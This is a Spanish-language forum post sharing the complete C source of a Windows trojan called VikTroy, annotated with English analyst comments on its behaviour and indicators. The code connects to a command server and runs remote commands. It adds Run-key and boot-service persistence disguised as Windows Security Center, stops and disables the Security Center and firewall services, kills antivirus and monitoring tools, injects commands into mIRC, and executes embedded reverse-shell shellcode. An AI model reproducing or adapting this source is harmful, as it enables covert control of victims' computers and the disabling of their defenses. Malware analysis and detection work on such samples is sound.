Troyano [C]

Iniciado por ANTRAX, Mayo 22, 2011, 10:01:56 PM



Mayo 22, 2011, 10:01:56 PM Ultima modificación: Febrero 08, 2014, 05:48:37 PM por Expermicid
/*
   Autor: Coded by Rozor\xZR !Sub_Level
   IRC: irc.irc-hispano.org #sub_level
   URL: http://sincontrol.tomahost.org
   Lenguaje: C/C++ Win32
   Name: VikTroy
   Ejecutable: VikTroy.exe

*/

// Mazard Roolz
// www.mazard.info
// http://sincontrol.tomahost.org/dor/virus/vk-troy.c

#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <winsock.h>
#include <stdlib.h>
#include <process.h>
#include <winbase.h>
//#include <sys\types.h>
#include <tlhelp32.h>

#define CM_PRUEBA 101
#define CM_SALIR 102

#pragma comment(lib, "wsock32.lib")


// SOCKET PRINCIPAL
// Command-and-control socket shared by every thread in the file: opened
// and connected in main(), written to by pcInfo() and SendProcess(),
// closed by the "exit" command in Comando().
SOCKET sck;
// Run-key persistence command (value name "Windows Update", data
// %systemroot%\viktroy.exe). Note for analysts: this array is never
// referenced by name in the listing; Comando() repeats the same literal
// inline for the "infectar" command.
char RegQueryInfo[] = "reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"Windows Update\" /t REG_SZ /d %systemroot%\\viktroy.exe";
// Service-tampering commands consumed only from the inline assembly in
// winFuck(): stop the Security Center and SharedAccess (Windows Firewall /
// ICS) services, then set their Start value to 4 (disabled) so they do not
// come back on reboot.
char SeCent[] = "net stop \"Security Center\"";
char Shared[] = "net stop \"SharedAccess\"";
char Reg1[] = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\" /v Start /t REG_DWORD /d 0x4 /f";
char Reg3[] = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\wscsvc\" /v Start /t REG_DWORD /d 0x4 /f";
// Second persistence mechanism: a boot-start service named "wscenter"
// whose display name imitates Windows Security Center. Detection: service
// creation with this name/binPath, plus the Run value above, are the
// host-based indicators this sample leaves behind.
char CreateSrv[] = "sc create wscenter binPath= \"%systemroot%\\system32\\viktroy.exe\" type= kernel start= boot error= ignore DisplayName= \"Windows Security Center\"";

// Window procedure for the "VentanaChat" class registered in CallChat();
// defined at the end of the file.
LRESULT CALLBACK WindowProc(HWND, UINT, WPARAM, LPARAM);

// PAYLOAD
// Opaque machine code executed by Reverse(): the array's address is cast to
// a function pointer and called. Nothing in this listing reveals what the
// bytes do; the surrounding comments label the caller a "reverse shell
// thread". The leading bytes look like a self-decoding stub rather than
// plain code, so static reading of the string is not informative — treat
// it as a blob to be hashed/compared, not interpreted (TODO confirm in a
// sandbox). The trailing 0x90 bytes are padding per the original layout.
unsigned char payload[] =

"\x33\xc9\x83\xe9\xb8\xe8"
"\xff\xff\xff\xff"
"\xc0\x5e\x81\x76\x0e\x4a"
"\x27\x98\xb9\x83\xee\xfc\xe2\xf4\xb6\x4d"
"\x73\xf4\xa2\xde\x67\x46"
"\xb5\x47\x13\xd5\x6e\x03\x13\xfc\x76\xac\xe4\xbc\x32\x26\x77\x32"
"\x05\x3f\x13\xe6\x6a\x26\x73\xf0\xc1\x13\x13\xb8\xa4\x16\x58\x20"
"\xe6\xa3\x58\xcd\x4d\xe6\x52\xb4\x4b\xe5\x73\x4d\x71\x73\xbc\x91"
"\x3f\xc2\x13\xe6\x6e\x26\x73\xdf\xc1\x2b\xd3\x32\x15\x3b\x99\x52"
"\x49\x0b\x13\x30\x26\x03\x84\xd8\x89\x16\x43\xdd\xc1\x64\xa8\x32"
"\x0a\x2b\x13\xc9\x56\x8a\x13\xf9\x42\x79\xf0\x37\x04\x29\x74\xe9"
"\xb5\xf1\xfe\xea\x2c\x4f\xab\x8b\x22\x50\xeb"
"\x8b\x15\x73\x67\x69" // w0w
"\x22\xec\x75\x45\x71\x77\x67"
"\x6f\x15\xae\x7d\xdf\xcb\xca\x90\xbb"
"\x1f\x4d\x9a\x46\x9a\x4f\x41\xb0\xbf\x8a\xcf\x46\x9c\x74\xcb\xea"
"\x19\x64\xcb\xfa\x19\xd8\x48\xd1\x35\x27\x98\xb8\x2c\x4f\x9a\x23"
"\x2c\x74\x11\x58\xdf\x4f\x74\x40\xe0\x47\xcf\x46\x9c\x4d\x88\xe8"
"\x1f\xd8\x48\xdf\x20\x43\xfe\xd1\x29\x4a\xf2\xe9\x13\x0e\x54\x30"
"\xad\x4d\xdc\x30\xa8\x16\x58\x4a\xe0\xb2\x11\x44\xb4\x65\xb5\x47"
"\x08\x0b\x15\xc3\x72\x8c\x33" // r0x
"\x12\x22\x55\x66\x0a\x5c\xd8\xed\x91"
"\xb5\xf1\xc3\xee\x18\x76\xc9\xe8"
"\x20\x26\xc9\xe8\x1f\x76\x67\x69"
"\x22\x8a\x41\xbc\x84\x74\x67\x6f\x20\xd8\x67\x8e\xb5\xf7\xf0\x5e"
"\x33\xe1\xe1\x46\x3f\x23\x67\x6f\xb5\x50\x64\x46\x9a\x4f\xe6\x61"
"\xa8\x54\xcb\x46\x9c"  // c0d3d
"\xd8\x48\xb9\x90\x90\x90";






//ListaProcesos
// Process-name kill list walked by SendProcess(): 17 entries, which is the
// hard-coded bound used by its loop. The names are admin/diagnostic tools
// (cmd, taskmgr, netstat, tasklist, taskkill, regedit, reg), AV/IDS/sniffer
// binaries (avp, ethereal, snort, tcpview, ettercap) and a browser. For
// analysts: the entry is spelled "whireshark.exe", so a process actually
// named wireshark.exe does not match this list.
char *proc_list[]={
"cmd.exe", "taskmgr.exe", "netstat.exe", "tasklist.exe", "taskkill.exe",
"avp.exe", "ethereal.exe", "whireshark.exe", "snort.exe", "control.exe",
     "autoruns.exe", "autorunsc.exe", "tcpview.exe", "ettercap.exe", "firefox.exe",
"regedit.exe", "reg.exe" };









// Thread Struct

// Bookkeeping record for one worker thread (label, handle, thread id).
// Filled by CrearThread(); nothing in the listing reads it back.
typedef struct thread_struct
{
char name[250];          // label such as "INFO", "SHELL" — written with sprintf()
HANDLE Thread_Handle;    // handle returned by CreateThread(); never closed here
int id;                  // DWORD thread id narrowed to int by the caller
} thread;

// Ten slots; CrearThread() picks one with rand()%10, so entries can be
// silently overwritten.
thread threads[10];





// Forward declarations. The set is declared twice and the two copies do not
// agree: Pong (defined only inside a commented-out block below), keyLogger
// and Infectar are declared here but have no definition in this listing,
// while SendProcess and CallChat appear only in the second copy.
int Comando(char recibido[130]);
int CrearThread(char *name, HANDLE Thread_Handle, int id);
void Esconder(void);
void Reverse(void);


DWORD WINAPI pcInfo(LPVOID param);
DWORD WINAPI ownMirc(LPVOID param);
DWORD WINAPI Pong(LPVOID param);
DWORD WINAPI keyLogger(LPVOID param);
DWORD WINAPI revShell(LPVOID param);
DWORD WINAPI Infectar(LPVOID param);
DWORD WINAPI winFuck(LPVOID param);
DWORD WINAPI Happy(LPVOID param);


// Second (partially overlapping) copy of the prototypes.
int Comando(char recibido[130]);
int CrearThread(char *name, HANDLE Thread_Handle, int id);
void Esconder(void);
void Reverse(void);
/*int main(void);*/
DWORD WINAPI pcInfo(LPVOID param);
DWORD WINAPI ownMirc(LPVOID param);
//DWORD WINAPI Pong(LPVOID param);
DWORD WINAPI revShell(LPVOID param);
DWORD WINAPI SendProcess(LPVOID param);
DWORD WINAPI winFuck(LPVOID param);
DWORD WINAPI Happy(LPVOID param);
DWORD WINAPI CallChat(LPVOID param);

/*
int main(int argc, char *argv[])
{
char bof[25];
strcpy(bof, argv[1]);
return 0;
}
*/


// INDEX

// Entry point: hides the console, connects the global socket to the C2
// address, sends a 5-byte banner and then polls the socket forever,
// handing anything longer than two bytes to Comando().
//
// Analyst notes (all from the visible code):
//  - As published the C2 address is 127.0.0.1:80; an operator would have to
//    change it before building, so the loopback value is not an indicator.
//  - The literal "HEllO" sent right after connect() is a stable network
//    signature for this sample.
//  - WSAStartup/socket/connect results are never checked; if connect()
//    fails the loop still runs with recv() failing every 800 ms.
//  - recvbuff is never NUL-terminated after recv(), yet Comando() applies
//    strchr()/strncmp() to it, so a command without an embedded NUL reads
//    past the received bytes (undefined behaviour).
//  - hThread and id are unused (the Pong thread is commented out) and
//    everything after the for(;;) is unreachable.
int main(void)
{
    HANDLE hThread;
DWORD id;
WSADATA wsa;
    struct sockaddr_in mysock;
char recvbuff[130];
char *hello = "HEllO";

WSAStartup(MAKEWORD(1, 0), &wsa);
sck = socket(AF_INET, SOCK_STREAM, 0);
Esconder();
mysock.sin_family = AF_INET;
mysock.sin_addr.s_addr = inet_addr("127.0.0.1");
mysock.sin_port = htons(80);
memset(&(mysock.sin_zero), '\0', 8);
//hThread = CreateThread(NULL, 0, Pong, NULL, 0, &id);
connect(sck, (struct sockaddr *)&mysock, sizeof(struct sockaddr));
send(sck, hello, strlen(hello), 0);
for(;;)
{
// Up to 128 of the 130 bytes are filled; no terminator is written.
if(recv(sck, recvbuff, 128, 0)>2)
{
      Comando(recvbuff);
}
Sleep(800);
}

// Unreachable: the loop above never breaks.
    Sleep(1000);
WSACleanup();
system("PAUSE");
return 1;
}






// Command dispatcher for data received from the C2 socket.
//
// The command is whatever follows the first '!' in the buffer. Each keyword
// is matched with strncmp() on a fixed prefix length, so several tests can
// fire for one message and longer strings with the same prefix also match
// ("shell" is compared on only 4 characters). Every CreateThread() handle is
// registered via CrearThread() and never closed.
//
// Returns -1 when no '!' is present (after printing "error" to the hidden
// console), 0 otherwise.
//
// Observable effects per keyword, for detection purposes:
//   info     -> pcInfo thread (system info over the socket, renames host)
//   mirc     -> ownMirc thread (injects a command into a running mIRC)
//   exit     -> closes the socket and spawns "taskkill /F /IM viktroy.exe"
//   shell    -> revShell thread (runs the embedded payload bytes)
//   busca    -> SendProcess thread (process kill loop)
//   winfuck  -> winFuck thread (stops/disables services, creates a service)
//   showcmd / hidecmd -> toggles the first console window found
//   happy    -> Happy thread (endless MessageBox loop)
//   chat     -> CallChat thread (creates a "Viktroy Talk" window)
//   infectar -> adds the Run value "Windows Update" via "reg add"
int Comando(char recibido[130])
{

HANDLE hThread;
DWORD id;

char *pString;

// Assumes the buffer is NUL-terminated; main() does not guarantee that.
pString = strchr(recibido, '!');
if(pString==NULL)
{
printf("error");
return -1;
}

pString++;

if(strncmp(pString, "info", 4)==0)
{
hThread = CreateThread(NULL, 0, pcInfo, NULL, 0, &id);
CrearThread("INFO", hThread, id);
Sleep(1000);
}

if(strncmp(pString, "mirc", 4)==0)
{
hThread = CreateThread(NULL, 0, ownMirc, NULL, 0, &id);
CrearThread("MIRC", hThread, id);
}

// Self-termination goes through an external taskkill process, which is
// itself a visible child-process event.
if(strncmp(pString, "exit", 4)==0)
{
closesocket(sck);
WSACleanup();
system("taskkill /F /IM viktroy.exe");
}

// Prefix length is 4 ("shel"), not 5.
if(strncmp(pString, "shell", 4)==0)
{
hThread = CreateThread(NULL, 0, revShell, NULL, 0, &id);
CrearThread("SHELL", hThread, id);
}

if(strncmp(pString, "busca", 5)==0)
{
hThread = CreateThread(NULL, 0, SendProcess, NULL, 0, &id);
CrearThread("SHRC", hThread, id);
}

if(strncmp(pString, "winfuck", 7)==0)
{
hThread = CreateThread(NULL, 0, winFuck, NULL, 0, &id);
CrearThread("FUCK", hThread, id);
}

// FindWindow() returns the first top-level window of that class, which is
// not necessarily this process's console.
if(strncmp(pString, "showcmd", 7)==0)
{
HWND hWnd;
    hWnd = FindWindow("ConsoleWindowClass", NULL);
    ShowWindow(hWnd, SW_SHOWNORMAL);
}

if(strncmp(pString, "hidecmd", 7)==0)
{
HWND hWnd;
    hWnd = FindWindow("ConsoleWindowClass", NULL);
    ShowWindow(hWnd, SW_HIDE);
}

if(strncmp(pString, "happy", 5)==0)
{
hThread = CreateThread(NULL, 0, Happy, NULL, 0, &id);
CrearThread("HAPPY", hThread, id);
}

if(strncmp(pString, "chat", 4)==0)
{
hThread = CreateThread(NULL, 0, CallChat, NULL, 0, &id);
CrearThread("CHAT", hThread, id);
}

// Same string as the global RegQueryInfo, duplicated inline. The Run
// value name "Windows Update" pointing at %systemroot%\viktroy.exe is the
// persistence indicator to look for.
if(strncmp(pString, "infectar", 8)==0)
{
      system("reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"Windows Update\" /t REG_SZ /d %systemroot%\\viktroy.exe");
    }


return 0;

}



// Transfers control to the bytes in payload[] by writing the array's
// address into a function-pointer variable through an int alias and calling
// it. This assumes a 32-bit build (pointer stored via int) and an executable
// data section; with DEP/NX enforced on the image the call faults instead of
// running. Called only from the revShell thread.
void Reverse(void)
{
  void(*rever)();
  *(int *)&rever = (int)payload;
  rever();

}

// Not ShellCode Call
/* PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
SOCKET rsck;
//WSADATA wsadata;
    struct sockaddr_in rSock;
    memset(&sinfo,0,sizeof(sinfo));
//WSAStartup(MAKEWORD(1, 0), &wsadata);
rsck = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
rSock.sin_addr.s_addr = inet_addr("127.0.0.1");
rSock.sin_family = AF_INET;
    bind(rsck, (struct sockaddr*)&rSock, sizeof(rSock));
rSock.sin_port = htons(666);
memset(&(rSock.sin_zero), 0, 8);

connect(rsck, (struct sockaddr *)&rSock, sizeof(rSock));
sinfo.cb = sizeof(sinfo);
sinfo.dwFlags = STARTF_USESTDHANDLES;
sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = rsck;
CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, 0, NULL, &sinfo, &pinfo);

  */



// ThreadGen
// Records a worker thread in a random slot of threads[] and returns the
// slot index.
//
// name  is used directly as the sprintf() format string, so any '%' in it
//       would be interpreted; all callers in this file pass fixed labels.
// rand() is never seeded anywhere in the listing, so the slot sequence is
//       the same on every run, and a chosen slot may overwrite an earlier
//       entry.
int CrearThread(char *name, HANDLE Thread_Handle, int id)
{
int c = rand()%10;
sprintf(threads[c].name,name);
threads[c].id = id;
threads[c].Thread_Handle = Thread_Handle;
return c;
}


// HIDE
// Hides the first window of class "ConsoleWindowClass" that FindWindow()
// returns. Intended to hide this process's own console; on a host with
// several consoles it may hide a different one. Called once at startup.
void Esconder(void)
{
HWND hWnd;
hWnd = FindWindow("ConsoleWindowClass", NULL);
ShowWindow(hWnd, SW_HIDE);
}


// Arquitectura
// Worker thread for the "info" command: builds a short processor
// description, renames the computer to "xZ-Ownk" and sends the description
// over the C2 socket. The parameter is unused.
//
// Analyst notes:
//  - allinfo is 16 bytes and never initialised before the first strcat(),
//    so the result depends on stack garbage; "Soy un INTEL " plus "Pentium "
//    alone is 21 characters, so the buffer is also overrun. Expect this
//    thread to produce garbage output or crash rather than clean data.
//  - SetComputerName("xZ-Ownk") is a persistent host-level indicator: a
//    machine whose name changed to this value (takes effect on reboot).
//  - The PPC branch labels PROCESSOR_ARCHITECTURE_PPC as "PocketPC"; the
//    constant denotes PowerPC. Levels 1 and 3 both map to "PPC 601".
//  - Architectures other than INTEL/PPC append nothing.
DWORD WINAPI pcInfo(LPVOID param)
{
SYSTEM_INFO sysinfo;
    char allinfo[16];
GetSystemInfo(&sysinfo);
if(sysinfo.wProcessorArchitecture==PROCESSOR_ARCHITECTURE_INTEL)
{
strcat(allinfo, "Soy un INTEL ");
if(sysinfo.wProcessorLevel==3)
{
strcat(allinfo, "!386 ");
}

else if(sysinfo.wProcessorLevel==4)
{
strcat(allinfo, "!486 ");
}

else if(sysinfo.wProcessorLevel==5)
{
strcat(allinfo, "Pentium ");
}

else { strcat(allinfo, "unknow "); }

}

else if(sysinfo.wProcessorArchitecture==PROCESSOR_ARCHITECTURE_PPC)
{
strcat(allinfo, "Soy un PocketPC ");

if(sysinfo.wProcessorLevel==1)
{
strcat(allinfo, "PPC 601 ");
}

else if(sysinfo.wProcessorLevel==3)
{
strcat(allinfo, "PPC 601 ");
}

else if(sysinfo.wProcessorLevel==20)
{
strcat(allinfo, "PPC 620 ");
}

}

// Host rename: visible in the registry/computer-name settings after reboot.
SetComputerName("xZ-Ownk");
    send(sck, allinfo, strlen(allinfo), 0);
return 0;

}


// Injeccion de comandos mirc. Gracias a CrowDat por su explicacion :P

// Worker thread for the "mirc" command: locates the edit control of a
// running mIRC status window (mIRC -> MDIClient -> mIRC_Status -> Edit),
// writes "/run VikTroy.exe" into it with WM_SETTEXT and then posts a
// VK_RETURN key message so mIRC executes it. Net effect, if mIRC is open:
// mIRC launches VikTroy.exe from its own working directory.
//
// SetForegroundWindow() is called with hWnd before hWnd is assigned, so the
// first call operates on an indeterminate handle. If any FindWindow step
// fails the messages go to a NULL window and nothing happens.
// Detection angle: WM_SETTEXT/keydown messages into another process's
// window, and mIRC spawning an unexpected executable.
DWORD WINAPI ownMirc(LPVOID param)
{
HWND hWnd;
char run1[] = "/run VikTroy.exe";
SetForegroundWindow(hWnd);
    hWnd = FindWindowEx(FindWindowEx(FindWindowEx(FindWindow("mIRC",
           NULL), 0, "MDIClient", 0),0, "mIRC_Status", 0), 0, "Edit", 0);

SendMessage(hWnd, WM_SETTEXT, 0, (LPARAM)run1);
SendMessage(hWnd, WM_IME_KEYDOWN, VK_RETURN, 0);
Sleep(1500);
return 0;
}


// Pong Conexion Thread

/*DWORD WINAPI Pong(LPVOID param)
{
char *pong="PONG";
for(;;)
{
Sleep(25000);
send(sck, pong, strlen(pong), 0);
}

return 1;
}
*/

// Reverse Shell Thread

// Worker thread for the "shell" command: runs Reverse(), i.e. jumps into
// the embedded payload bytes. Only returns if the payload returns.
DWORD WINAPI revShell(LPVOID param)
{

    Reverse();
return 0;

}


// Tripode

// Worker thread for the "busca" command: an endless loop that, for each of
// the 17 names in proc_list, takes a process snapshot, prints every process
// to the (hidden) console, reports the first sighting of mirc.exe over the
// C2 socket, and force-kills any process whose image name matches the
// current list entry via a hidden "taskkill /F /PID <pid>".
//
// Analyst notes:
//  - 17 snapshots are taken per 100 ms sleep; this thread is CPU-noisy and
//    spawns a taskkill child for every match — both easy to spot.
//  - proname is 30 bytes but receives "<pid> <szExeFile>" where szExeFile
//    is MAX_PATH long, so long image names overflow it.
//  - killer (30 bytes) holds "taskkill /F /PID " plus a PID; that fits.
//  - The function never returns (outer for(;;)) and has no return
//    statement, which a compiler flags for a DWORD-returning function.
DWORD WINAPI SendProcess(LPVOID param)
{

HANDLE hlista;
PROCESSENTRY32 proceso;
char proname[30];
char killer[30];
int ret, i, mok;

    mok = 0;   // set once the first mirc.exe report has been sent
    for(;;)
{
  ret = 0;
  i = 0;

    for(i=0;i<17;i++)
{
    ZeroMemory(&proceso,sizeof(proceso));
proceso.dwSize = sizeof(proceso);
if ((hlista = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0)) != (HANDLE)-1) /* returns a handle to a snapshot of all processes */
{
ret = Process32First(hlista,&proceso);
while(ret)
{

sprintf(proname,"%i %s",proceso.th32ProcessID,proceso.szExeFile);
printf("\n%s",proname);

if(strcmp(proceso.szExeFile, "mirc.exe")==0 && mok==0 )
{
send(sck, "\nEncontrado Mirc.exe\n", strlen("\nEncontrado Mirc.exe\n"), 0);
    mok++;
}

// Kill via an external taskkill process rather than TerminateProcess.
if(strcmp(proceso.szExeFile, proc_list[i])==0)
{
sprintf(killer, "taskkill /F /PID %d", proceso.th32ProcessID);
WinExec(killer, SW_HIDE);
}


ret = Process32Next(hlista,&proceso);
}

   CloseHandle(hlista);
}
}
     Sleep(100);

}

}



/*HKEY hKey;
unsigned char direccion[] = "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run";
    unsigned char proceso[] = "VikTroy.exe";

RegCreateKey(HKEY_LOCAL_MACHINE, "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" , &hKey);
RegSetValueEx(hKey, "Microsoft Windows Firewall", 0, REG_SZ, proceso, sizeof("proceso"));
    RegCloseKey(hKey);*/




// WINDOWS FUCKEd x"DDDDDDDDDDD

// Worker thread for the "winfuck" command: runs the five command strings
// declared at file scope (SeCent, Shared, Reg1, Reg3, CreateSrv) through
// system(), using MSVC inline assembly instead of direct calls. Each group
// pushes the string address, calls system and pops the argument back off
// the stack into ebx (which is clobbered without being preserved).
//
// Effects in order: stop Security Center, stop SharedAccess (firewall/ICS),
// disable SharedAccess at boot, disable wscsvc at boot, create the boot
// service "wscenter" for viktroy.exe. Each step is a separate cmd.exe child
// running net / reg / sc, which is how this thread shows up in process
// telemetry. __asm is MSVC 32-bit only syntax.
DWORD WINAPI winFuck(LPVOID param)
{



        __asm {
     mov eax, offset SeCent
push eax
call system
pop ebx
nop
nop

// Security Center Off

mov eax, offset Shared
push eax
call system
pop ebx
nop
nop
// Shared Off

     mov eax, offset Reg1
push eax
call system
pop ebx
nop
nop
// Reg1 In


mov eax, offset Reg3
push eax
call system
pop ebx
nop
nop

mov  eax, offset CreateSrv
push eax
                 call system
pop ebx
nop
nop

}// Reg2 In

return 0;


}



// Funcion Feliz

// Worker thread for the "happy" command: shows an error-styled message box
// with the author banner and re-shows it every time the user dismisses it.
// With MB_OK the only possible button result is IDOK, so the loop never
// ends; if MessageBox() ever returns 0 (failure) the condition is false and
// the loop becomes a tight busy spin with no dialog. The return -1 is
// unreachable. The banner text and caption are fixed strings and can serve
// as a string signature for the binary.
DWORD WINAPI Happy(LPVOID param)
{
int a = 0;
    char *Texto = " VikTroy: Simple Trojan Horse   \n"
          " http://sincontrol.tomahost.org \n"
  " Gm Vk Tj Pp                    \n"
  " irc-hispano.org #sub_level     \n"
  " by xZR !Sub_Level Security     \n";

a = MessageBox(NULL,
      Texto,
  "by xZR !Sub_Level",
  MB_OK | MB_ICONERROR | MB_DEFBUTTON4);
   for(;;)
   {
    if(a==IDOK || a==IDYES || a==IDABORT || a==IDCANCEL || a==IDNO)
{
           a= MessageBox(NULL,
                Texto,
           "by xZR !Sub_Level",
                        MB_OK | MB_ICONERROR | MB_DEFBUTTON4);
}
 
  }

  return -1;
}



// Not Avaible

// Worker thread for the "chat" command (marked "Not Avaible" by the
// author): registers a window class "VentanaChat", creates an overlapped
// window titled "Viktroy Talk" and runs a message loop until WM_QUIT.
// No chat or socket logic exists — chatsock/chsock are declared but never
// used, as are hPrevInstance, CmdLine and uCmd.
//
// Analyst notes:
//  - hInstance is never assigned, so both the class registration and
//    CreateWindowEx() receive an indeterminate module handle; class
//    registration may fail and the window may never appear.
//  - LoadIcon(NULL, "icono.ico") passes a file name where a resource
//    identifier is expected; with a NULL instance this presumably fails —
//    confirm against the API if it matters.
//  - The background brush is (HBRUSH)COLOR_HIGHLIGHT without the usual +1,
//    which refers to the wrong system colour.
//  - Comparing GetMessage() to TRUE is the pattern the API documentation
//    warns against, since the function can return -1 on error.
DWORD WINAPI CallChat(LPVOID param)
{
HINSTANCE hInstance, hPrevInstance;
LPSTR CmdLine;
int uCmd;
HWND hWnd;
MSG uMsg;
WNDCLASSEX wincl;
SOCKET chatsock;
    struct sockaddr_in chsock;

wincl.cbClsExtra = 0;
wincl.cbWndExtra = 0;
wincl.cbSize = sizeof(WNDCLASSEX);
wincl.hbrBackground = (HBRUSH) COLOR_HIGHLIGHT;
wincl.hCursor = LoadCursor(NULL, IDC_ARROW);
wincl.hIcon = LoadIcon(NULL, "icono.ico");
wincl.hIconSm = LoadIcon(NULL, "icono.ico");
wincl.hInstance = hInstance;
wincl.lpfnWndProc = WindowProc;
wincl.lpszClassName = "VentanaChat";
wincl.lpszMenuName = NULL;
wincl.style = CS_DBLCLKS;

RegisterClassEx(&wincl);

// Window class and title are fixed strings — usable as indicators.
hWnd = CreateWindowEx(             0,
                   "VentanaChat",
  "Viktroy Talk",
   WS_OVERLAPPEDWINDOW,
   CW_USEDEFAULT,
   CW_USEDEFAULT,
   CW_USEDEFAULT,
   CW_USEDEFAULT,
    HWND_DESKTOP,
                        NULL,
   hInstance,
NULL);

ShowWindow(hWnd, SW_SHOWDEFAULT);

while(TRUE == GetMessage(&uMsg, 0, 0, 0))
{
        TranslateMessage(&uMsg);
DispatchMessage(&uMsg);
}

return uMsg.wParam;


}


// Window procedure for the "VentanaChat" window created by CallChat():
// posts WM_QUIT on WM_DESTROY so the message loop there exits, and forwards
// every other message to DefWindowProc().
LRESULT CALLBACK WindowProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
switch(uMsg)
{
case WM_DESTROY:
PostQuitMessage(0);
break;
default:
return DefWindowProc(hWnd, uMsg, wParam, lParam);
}

return 0;
}